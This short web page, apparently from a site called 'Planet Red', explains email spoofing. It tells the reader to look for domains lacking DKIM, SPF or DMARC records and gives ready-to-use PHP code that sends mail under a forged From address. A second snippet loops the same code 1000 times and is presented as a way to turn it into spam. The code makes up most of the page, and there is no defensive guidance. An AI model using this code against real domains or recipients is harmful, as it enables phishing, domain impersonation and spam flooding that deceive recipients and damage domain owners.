Planet Red

Email Attacks

Domains without the proper DNS records can be easily spoofed with some simple code. Look for domains without DKIM, SPF, or DMARC records.

<?php
$to = “<recipient email>”;
$subject = “Proof of concept”;
$txt = “This email was sent from your domain”;
$headers = “From: notarealaddress@<enter your address>” . “\r\n” .
“CC: “;

mail($to,$subject,$txt,$headers);
?>


You can just as easily turn it into spam by placing it in a for loop and sending your emails 1000 times.


<?php

for ($x = 0; $x <= 1000; $x++) {

    $to = “<recipient email>”;
    $subject = “Proof of concept”;
    $txt = “This email was sent from your domain”;
    $headers = “From: notarealaddress@<enter your address>” . “\r\n” .
    “CC: “;

    mail($to,$subject,$txt,$headers);

}
?>